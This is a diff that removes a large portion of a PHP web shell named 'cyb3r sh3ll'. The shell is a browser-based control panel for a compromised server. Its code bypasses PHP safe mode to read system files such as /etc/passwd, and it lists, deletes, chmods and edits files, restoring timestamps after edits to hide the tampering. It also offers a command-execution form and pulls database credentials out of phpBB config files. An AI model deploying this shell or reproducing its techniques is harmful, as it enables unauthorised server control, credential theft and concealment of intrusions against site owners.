-  // Compiling table

-

-  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);

-

-  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#15354c borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";

-

-  foreach($table as $row)

-

-  {

-

-   echo "<tr>\r\n";

-

-   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}

-

-   echo "</tr>\r\n";

-

-  }

-

-  echo "</table><br><hr size=\"1\" noshade><p align=\"right\">

-

-  <script>

-

-  function ls_setcheckboxall(status)

-

-  {

-

-   var id = 1;

-

-   var num = ".(count($table)-2).";

-

-   while (id <= num)

-

-   {

-

-    document.getElementById('actbox'+id).checked = status;

-

-    id++;

-

-   }

-

-  }

-

-  function ls_reverse_all()

-

-  {

-

-   var id = 1;

-

-   var num = ".(count($table)-2).";

-

-   while (id <= num)

-

-   {

-

-    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;

-

-    id++;

-

-   }

-

-  }

-

-  </script>

-

-  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 

-

-  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";

-

-  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))

-

-  {

-

-   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";

-

-  }

-

-  echo "<select name=act><option value=\"".$act."\">With selected:</option>";

-

-  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";

-

-  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";

-

-  if ($usefsbuff)

-

-  {

-

-   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";

-

-   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";

-

-   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";

-

-  }

-

-  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";

-

-  echo "</form><hr size=\"1\" noshade>";

- } 

- ?>

-<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" borderColorLight=#c0c0c0 border=1>

-     <tr> <!-- 1 -->

-           <td valign="top" width="33%" ><p align="center"><b>:: PHP Safe Mode Bypass ::</b></p></td>

-           <td valign="top" width="33%" ><p align="center"><b>:: Make File/Directory ::</b></p></td>

-           <td valign="top" ><p align="center"><b>:: Go File/Directory ::</b></p></td>

-         </tr>

-     <tr><!-- 3 -->

-         <td valign="top">

-

-   <center><b>(: List Directories :)</b>    <form action="<?php echo $surl; ?>">

-

-      <div align="center"><br>

-

-      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br></div>

-<?php

-

-        

-

-        function rsg_glob()

-

-{

-

-$chemin=$_GET['directory'];

-

-$files = glob("$chemin*");

-

-echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";

-

-foreach ($files as $filename) {

-

-        echo "<pre>";

-

-   echo "$filename\n";

-

-   echo "</pre>";

-

-}

-

-}

-

-

-

-if(isset($_GET['directory']))

-

-{

-

-rsg_glob();

-

-}

-

-

-

-?>

-

-

-    </form></center>

-

-    </td>

-         <td>

-         <center><b>[: Make Directory :]</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>

-         </td>

-         <td>

-         <center><b>{: Go Directory :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>

-         </td>

-         </tr>

-          <tr><!-- 2 -->

-            <td valign="top">

-

-         <div align="center"><b>(: Read Files :)</b></div><br>

-

-         <form action="<?php echo $surl; ?>">

-

-            <div align="center">File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>

-                        <?php     

-

-      function rsg_read()

-

-        {       

-

-        $test="";

-

-        $temp=tempnam($test, "cx");

-

-        $file=$_GET['file'];    

-

-        $get=htmlspecialchars($file);

-

-        echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";

-

-        if(copy("compress.zlib://".$file, $temp)){

-

-        $fichier = fopen($temp, "r");

-

-        $action = fread($fichier, filesize($temp));

-

-        fclose($fichier);

-

-        $source=htmlspecialchars($action);

-

-        echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";

-

-        unlink($temp);

-

-        } else {

-

-        die("<FONT COLOR=\"RED\"><CENTER>Sorry... File

-

-        <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have

-

-        access.</CENTER></FONT>");

-

-                        }

-

-        echo "</div>";

-

-        }

-

-        

-

-        if(isset($_GET['file']))

-

-{

-

-rsg_read();

-

-}

-

-        

-

-        ?>

-            

-

-          <br>

-

-      </div>

-

-         </form>

-

-        </td>

-            <td >

-                <center><b>[: Make File :]</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>

-                </td>

-                <td>

-                <center><b>{: Go File :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>

-                </td>

-                

-         </tr>

-     

- </table> <?php 

- }

-

-

-if ($act == "delete")

-

-{

-

- $delerr = "";

-

- foreach ($actbox as $v)

-

- {

-

-  $result = FALSE;

-

-  $result = fs_rmobj($v);

-

-  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}

-

- }

-

- if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}

-

- $act = "ls";

-

-}

-

-if ($act == "chmod")

-

-{

-

- $mode = fileperms($d.$f);

-

- if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}

-

- else

-

- {

-

-  $form = TRUE;

-

-  if ($chmod_submit)

-

-  {

-

-   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);

-

-   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}

-

-   else {$err = "Can't chmod to ".$octet.".";}

-

-  }

-

-  if ($form)

-

-  {

-

-   $perms = parse_perms($mode);

-

-   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";

-

-  }

-

- }

-

-}

-

-if ($act == "search")

-

-{

-

- echo "<b>Search in file-system:</b><br>";

-

- if (empty($search_in)) {$search_in = $d;}

-

- if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}

-

- if (empty($search_text_wwo)) {$search_text_regexp = 0;}

-

- if (!empty($submit))

-

- {

-

-  $found = array();

-

-  $found_d = 0;

-

-  $found_f = 0;

-

-  $search_i_f = 0;

-

-  $search_i_d = 0;

-

-  $a = array

-

-  (

-

-   "name"=>$search_name, "name_regexp"=>$search_name_regexp,

-

-   "text"=>$search_text, "text_regexp"=>$search_text_regxp,

-

-   "text_wwo"=>$search_text_wwo,

-

-   "text_cs"=>$search_text_cs,

-

-   "text_not"=>$search_text_not

-

-  );

-

-  $searchtime = getmicrotime();

-

-  $in = array_unique(explode(";",$search_in));

-

-  foreach($in as $v) {cyb3rfsearch($v);}

-

-  $searchtime = round(getmicrotime()-$searchtime,4);

-

-  if (count($found) == 0) {echo "<b>No files found!</b>";}

-

-  else

-

-  {

-

-   $ls_arr = $found;

-

-   $disp_fullpath = TRUE;

-

-   $act = "ls";

-

-  }

-

- }

-

- echo "<form method=POST>

-

-<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">

-

-<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp

-

-<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">

-

-<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>

-

-<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp

-

-&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only

-

-&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive

-

-&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text

-

-<br><br><input type=submit name=submit value=\"Search\"></form>";

-

- if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}

-

-}

-

-if ($act == "fsbuff")

-

-{

-

- $arr_copy = $sess_data["copy"];

-

- $arr_cut = $sess_data["cut"];

-

- $arr = array_merge($arr_copy,$arr_cut);

-

- if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}

-

- else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}

-

-}

-

-if ($act == "d")

-

-{

-

- if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}

-

- else

-

- {

-

-  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";

-

-  if (!$win)

-

-  {

-

-   echo "<tr><td><b>Owner/Group</b></td><td> ";

-

-   $ow = posix_getpwuid(fileowner($d));

-

-   $gr = posix_getgrgid(filegroup($d));

-

-   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));

-

-  }

-

-  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";

-

- }

-

-}

-

-if ($act == "chmod")

-

-{

-

- $mode = fileperms($d.$f);

-

- if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}

-

- else

-

- {

-

-  $form = TRUE;

-

-  if ($chmod_submit)

-

-  {

-

-   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);

-

-   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}

-

-   else {$err = "Can't chmod to ".$octet.".";}

-

-  }

-

-  if ($form)

-

-  {

-

-   $perms = parse_perms($mode);

-

-   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";

-

-  }

-

- }

-

-}

-

-if ($act == "f")

-

-{

-

- if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")

-

- {

-

-  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}

-

-  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}

-

- }

-

- else

-

- {

-

-  $r = @file_get_contents($d.$f);

-

-  $ext = explode(".",$f);

-

-  $c = count($ext)-1;

-

-  $ext = $ext[$c];

-

-  $ext = strtolower($ext);

-

-  $rft = "";

-

-  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}

-

-  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}

-

-  if (empty($ft)) {$ft = $rft;}

-

-  $arr = array(

-

-   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),

-

-   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),

-

-   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),

-

-   array("Code","code"),

-

-   array("Session","phpsess"),

-

-   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),

-

-   array("SDB","sdb"),

-

-   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),

-

-   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),

-

-   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),

-

-   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),

-

-   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")

-

-  );

-

-  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";

-

-  foreach($arr as $t)

-

-  {

-

-   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}

-

-   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}

-

-   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}

-

-   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";

-

-  }

-

-  echo "<hr size=\"1\" noshade>";

-

-  if ($ft == "info")

-

-  {

-

-   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";

-

-   if (!$win)

-

-   {

-

-    echo "<tr><td><b>Owner/Group</b></td><td> ";    

-

-    $ow = posix_getpwuid(fileowner($d.$f));

-

-    $gr = posix_getgrgid(filegroup($d.$f));

-

-    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));

-

-   }

-

-   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";

-

-   $fi = fopen($d.$f,"rb");

-

-   if ($fi)

-

-   {

-

-    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}

-

-    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}

-

-    $n = 0;

-

-    $a0 = "00000000<br>";

-

-    $a1 = "";

-

-    $a2 = "";

-

-    for ($i=0; $i<strlen($str); $i++)

-

-    {

-

-     $a1 .= sprintf("%02X",ord($str[$i]))." ";

-

-     switch (ord($str[$i]))

-

-     {

-

-      case 0:  $a2 .= "<font>0</font>"; break;

-

-      case 32:

-

-      case 10:

-

-      case 13: $a2 .= "&nbsp;"; break;

-

-      default: $a2 .= htmlspecialchars($str[$i]);

-

-     }

-

-     $n++;

-

-     if ($n == $hexdump_rows)

-

-     {

-

-      $n = 0;

-

-      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}

-

-      $a1 .= "<br>";

-

-      $a2 .= "<br>";

-

-     }

-

-    }

-

-    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}

-

-    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";

-

-   }

-

-   $encoded = "";

-

-   if ($base64 == 1)

-

-   {

-

-    echo "<b>Base64 Encode</b><br>";

-

-    $encoded = base64_encode(file_get_contents($d.$f));

-

-   }

-

-   elseif($base64 == 2)

-

-   {

-

-    echo "<b>Base64 Encode + Chunk</b><br>";

-

-    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));

-

-   }

-

-   elseif($base64 == 3)

-

-   {

-

-    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";

-

-    $encoded = base64_encode(file_get_contents($d.$f));

-

-    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);

-

-   }

-

-   elseif($base64 == 4)

-

-   {

-

-    $text = file_get_contents($d.$f);

-

-    $encoded = base64_decode($text);

-

-    echo "<b>Base64 Decode";

-

-    if (base64_encode($encoded) != $text) {echo " (failed)";}

-

-    echo "</b><br>";

-

-   }

-

-   if (!empty($encoded))

-

-   {

-

-    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";

-

-   }

-

-   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>

-

-<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>

-

-<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>

-

-<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>

-

-<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>

-

-<P>";

-

-  }

-

-  elseif ($ft == "html")

-

-  {

-

-   if ($white) {@ob_clean();}

-

-   echo $r;

-

-   if ($white) {cyb3rexit();}

-

-  }

-

-  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}

-

-  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}

-

-  elseif ($ft == "phpsess")

-

-  {

-

-   echo "<pre>";

-

-   $v = explode("|",$r);

-

-   echo $v[0]."<br>";

-

-   var_dump(unserialize($v[1]));

-

-   echo "</pre>";

-

-  }

-

-  elseif ($ft == "exe")

-

-  {

-

-   $ext = explode(".",$f);

-

-   $c = count($ext)-1;

-

-   $ext = $ext[$c];

-

-   $ext = strtolower($ext);

-

-   $rft = "";

-

-   foreach($exeftypes as $k=>$v)

-

-   {

-

-    if (in_array($ext,$v)) {$rft = $k; break;}

-

-   }

-

-   $cmd = str_replace("%f%",$f,$rft);

-

-   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";

-

-  }

-

-  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}

-

-  elseif ($ft == "code")

-

-  {

-

-   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))

-

-   {

-

-    $arr = explode("\n",$r);

-

-    if (count($arr == 18))

-

-    {

-

-     include($d.$f);

-

-     echo "<b>phpBB configuration is detected in this file!<br>";

-

-     if ($dbms == "mysql4") {$dbms = "mysql";}

-

-     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}

-

-     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by cyb3rell. Please, report us for fix.";}

-

-     echo "Parameters for manual connect:<br>";

-

-     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);

-

-     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}

-

-     echo "</b><hr size=\"1\" noshade>";

-

-    }

-

-   }

-

-   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";

-

-   if (!empty($white)) {@ob_clean();}

-

-   highlight_file($d.$f);

-

-   if (!empty($white)) {cyb3rexit();}

-

-   echo "</div>";

-

-  }

-

-  elseif ($ft == "download")

-

-  {

-

-   @ob_clean();

-

-   header("Content-type: application/octet-stream");

-

-   header("Content-length: ".filesize($d.$f));

-

-   header("Content-disposition: attachment; filename=\"".$f."\";");

-

-   echo $r;

-

-   exit;

-

-  }

-

-  elseif ($ft == "notepad")

-

-  {

-

-   @ob_clean();

-

-   header("Content-type: text/plain");

-

-   header("Content-disposition: attachment; filename=\"".$f.".txt\";");

-

-   echo($r);

-

-   exit;

-

-  }

-

-  elseif ($ft == "img")

-

-  {

-

-   $inf = getimagesize($d.$f);

-

-   if (!$white)

-

-   {

-

-    if (empty($imgsize)) {$imgsize = 20;}

-

-    $width = $inf[0]/100*$imgsize;

-

-    $height = $inf[1]/100*$imgsize;

-

-    echo "<center><b>Size:</b>&nbsp;";

-

-    $sizes = array("100","50","20");

-

-    foreach ($sizes as $v)

-

-    {

-

-     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";

-

-     if ($imgsize != $v ) {echo $v;}

-

-     else {echo "<u>".$v."</u>";}

-

-     echo "</a>&nbsp;&nbsp;&nbsp;";

-

-    }

-

-    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";

-

-   }

-

-   else

-

-   {

-

-    @ob_clean();

-

-    $ext = explode($f,".");

-

-    $ext = $ext[count($ext)-1];

-

-    header("Content-type: ".$inf["mime"]);

-

-    readfile($d.$f);

-

-    exit;

-

-   }

-

-  }

-

-  elseif ($ft == "edit")

-

-  {

-

-   if (!empty($submit))

-

-   {

-

-    if ($filestealth) {$stat = stat($d.$f);}

-

-    $fp = fopen($d.$f,"w");

-

-    if (!$fp) {echo "<b>Can't write to file!</b>";}

-

-    else

-

-    {

-

-     echo "<b>Saved!</b>";

-

-     fwrite($fp,$edit_text);

-

-     fclose($fp);

-

-     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}

-

-     $r = $edit_text;

-

-    }

-

-   }

-

-   $rows = count(explode("\r\n",$r));

-

-   if ($rows < 10) {$rows = 10;}

-

-   if ($rows > 30) {$rows = 30;}

-

-   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";

-

-  }

-

-  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}

-

-  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}

-

- }

-

-}

-

-if ($act == "about") 

-{

-echo '<table align="center"><tr><td><b><font color="orange">Script:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>

-Name: cyb3r sh3ll<br>Version: '.$shver.'</font><br/><br/>Author:<br>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br>

-Name: cyb3r 9l4d!470r (Cyber Gladiator)<br>Country: India<br>Website: ????...<br>Email: cyb3r.gladiat0r@gmail.com 

